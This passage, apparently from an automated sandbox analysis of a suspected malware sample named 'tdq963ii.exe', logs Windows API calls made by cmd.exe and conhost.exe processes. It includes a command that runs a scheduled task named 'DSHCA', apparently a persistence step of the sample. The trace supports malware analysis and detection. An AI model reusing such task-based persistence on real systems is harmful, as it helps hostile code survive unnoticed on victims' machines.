_String2="RENAME") returned 2 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0203.750] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0203.751] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0203.752] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0203.753] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0203.754] GetProcessHeap () returned 0x4f0000 [0203.754] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x502490 [0203.754] GetProcessHeap () returned 0x4f0000 [0203.754] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x74) returned 0x508fb8 [0203.754] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0203.756] GetProcessHeap () returned 0x4f0000 [0203.756] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x5026a8 [0203.756] SetErrorMode (uMode=0x0) returned 0x0 [0203.756] SetErrorMode (uMode=0x1) returned 0x0 [0203.756] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5026b0, lpFilePart=0x14ede0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14ede0*="Desktop") returned 0x25 [0203.756] SetErrorMode (uMode=0x0) returned 0x1 [0203.756] GetProcessHeap () returned 0x4f0000 [0203.756] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5026a8, Size=0x6e) returned 0x5026a8 [0203.757] GetProcessHeap () returned 0x4f0000 [0203.757] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x5026a8) returned 0x6e [0203.757] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.757] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.757] GetProcessHeap () returned 0x4f0000 [0203.757] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x502720 [0203.757] GetProcessHeap () returned 0x4f0000 [0203.757] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x502848 [0203.768] GetConsoleTitleW (in: lpConsoleTitle=0x14f054, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.768] InitializeProcThreadAttributeList (in: lpAttributeList=0x14eedc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14efa4 | out: lpAttributeList=0x14eedc, lpSize=0x14efa4) returned 1 [0203.768] UpdateProcThreadAttribute (in: lpAttributeList=0x14eedc, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ef9c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14eedc, lpPreviousValue=0x0) returned 1 [0203.768] GetStartupInfoW (in: lpStartupInfo=0x14ee98 | out: lpStartupInfo=0x14ee98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0203.909] CloseHandle (hObject=0x74) returned 1 [0203.909] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.909] GetProcessHeap () returned 0x4f0000 [0203.909] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502d70 | out: hHeap=0x4f0000) returned 1 [0203.909] GetEnvironmentStringsW () returned 0x502c98* [0203.909] GetProcessHeap () returned 0x4f0000 [0203.909] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x50af20 [0203.909] FreeEnvironmentStringsW (penv=0x502c98) returned 1 [0203.909] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0209.688] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x14ee78 | out: lpExitCode=0x14ee78*=0x1) returned 1 [0209.688] CloseHandle (hObject=0x78) returned 1 [0209.689] _vsnwprintf (in: _Buffer=0x14efc0, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ee84 | out: _Buffer="00000001") returned 8 [0209.689] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0209.689] GetProcessHeap () returned 0x4f0000 [0209.689] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50af20 | out: hHeap=0x4f0000) returned 1 [0209.689] GetEnvironmentStringsW () returned 0x502c98* [0209.689] GetProcessHeap () returned 0x4f0000 [0209.689] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x50af20 [0209.689] FreeEnvironmentStringsW (penv=0x502c98) returned 1 [0209.689] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.689] GetProcessHeap () returned 0x4f0000 [0209.689] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50af20 | out: hHeap=0x4f0000) returned 1 [0209.689] GetEnvironmentStringsW () returned 0x502c98* [0209.690] GetProcessHeap () returned 0x4f0000 [0209.690] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb86) returned 0x50af20 [0209.690] FreeEnvironmentStringsW (penv=0x502c98) returned 1 [0209.690] GetProcessHeap () returned 0x4f0000 [0209.690] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5000d0 | out: hHeap=0x4f0000) returned 1 [0209.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x14eedc | out: lpAttributeList=0x14eedc) [0209.690] _get_osfhandle (_FileHandle=1) returned 0x80 [0209.690] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0209.690] _get_osfhandle (_FileHandle=1) returned 0x80 [0209.690] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0209.690] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.690] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0209.691] SetConsoleInputExeNameW () returned 0x1 [0209.691] GetConsoleOutputCP () returned 0x1b5 [0209.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0209.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.692] exit (_Code=1) Process: id = "203" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1d528000" os_pid = "0x7a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 758 os_tid = 0xb0 Thread: id = 765 os_tid = 0x620 Thread: id = 782 os_tid = 0x648 Process: id = "204" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2ce1c000" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x92c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 761 os_tid = 0x6a0 [0211.974] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f93c | out: lpSystemTimeAsFileTime=0x24f93c*(dwLowDateTime=0x36c86960, dwHighDateTime=0x1d68287)) [0211.974] GetCurrentProcessId () returned 0xad0 [0211.974] GetCurrentThreadId () returned 0x6a0 [0211.974] GetTickCount () returned 0x11610d3 [0211.974] QueryPerformanceCounter (in: lpPerformanceCount=0x24f934 | out: lpPerformanceCount=0x24f934*=33231282110) returned 1 [0211.975] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0211.975] __set_app_type (_Type=0x1) [0211.976] __p__fmode () returned 0x770331f4 [0211.976] __p__commode () returned 0x770331fc [0211.976] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0211.976] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0211.976] GetCurrentThreadId () returned 0x6a0 [0211.976] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6a0) returned 0x60 [0211.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.976] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0211.977] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.977] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.977] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f8cc | out: phkResult=0x24f8cc*=0x0) returned 0x2 [0211.977] VirtualQuery (in: lpAddress=0x24f903, lpBuffer=0x24f89c, dwLength=0x1c | out: lpBuffer=0x24f89c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.977] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f89c, dwLength=0x1c | out: lpBuffer=0x24f89c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0211.977] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f89c, dwLength=0x1c | out: lpBuffer=0x24f89c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0211.977] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f89c, dwLength=0x1c | out: lpBuffer=0x24f89c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.977] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f89c, dwLength=0x1c | out: lpBuffer=0x24f89c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0211.977] GetConsoleOutputCP () returned 0x1b5 [0211.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0211.978] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0211.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.978] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0211.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0211.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.979] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.979] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.979] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0211.979] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.979] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0211.980] GetEnvironmentStringsW () returned 0x582120* [0211.980] GetProcessHeap () returned 0x570000 [0211.980] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x582c60 [0211.980] FreeEnvironmentStringsW (penv=0x582120) returned 1 [0211.981] GetProcessHeap () returned 0x570000 [0211.981] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0x5818c0 [0211.981] GetEnvironmentStringsW () returned 0x582120* [0211.981] GetProcessHeap () returned 0x570000 [0211.981] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x5837a0 [0211.981] FreeEnvironmentStringsW (penv=0x582120) returned 1 [0211.981] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e83c | out: phkResult=0x24e83c*=0x68) returned 0x0 [0211.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x0, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.981] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x1, lpcbData=0x24e840*=0x4) returned 0x0 [0211.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x1, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x0, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x40, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x40, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x40, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.982] RegCloseKey (hKey=0x68) returned 0x0 [0211.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e83c | out: phkResult=0x24e83c*=0x68) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x40, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x1, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x1, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x0, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x9, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x4, lpData=0x24e848*=0x9, lpcbData=0x24e840*=0x4) returned 0x0 [0211.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e844, lpData=0x24e848, lpcbData=0x24e840*=0x1000 | out: lpType=0x24e844*=0x0, lpData=0x24e848*=0x9, lpcbData=0x24e840*=0x1000) returned 0x2 [0211.982] RegCloseKey (hKey=0x68) returned 0x0 [0211.983] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2ee [0211.983] srand (_Seed=0x5f51e2ee) [0211.983] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" [0211.983] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Run /I /tn DSHCA" [0211.983] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0211.984] GetProcessHeap () returned 0x570000 [0211.984] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x582120 [0211.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x582128, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0211.984] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0211.984] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.984] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0211.984] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.984] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.984] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0211.984] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0211.985] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0211.985] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0211.985] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0211.985] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0211.985] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0211.985] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0211.985] GetProcessHeap () returned 0x570000 [0211.985] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x5817f0 [0211.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f608 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0211.985] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f608, lpFilePart=0x24f604 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f604*="Desktop") returned 0x25 [0211.985] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0211.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f384 | out: lpFindFileData=0x24f384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x582338 [0211.985] FindClose (in: hFindFile=0x582338 | out: hFindFile=0x582338) returned 1 [0211.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f384 | out: lpFindFileData=0x24f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x582338 [0211.986] FindClose (in: hFindFile=0x582338 | out: hFindFile=0x582338) 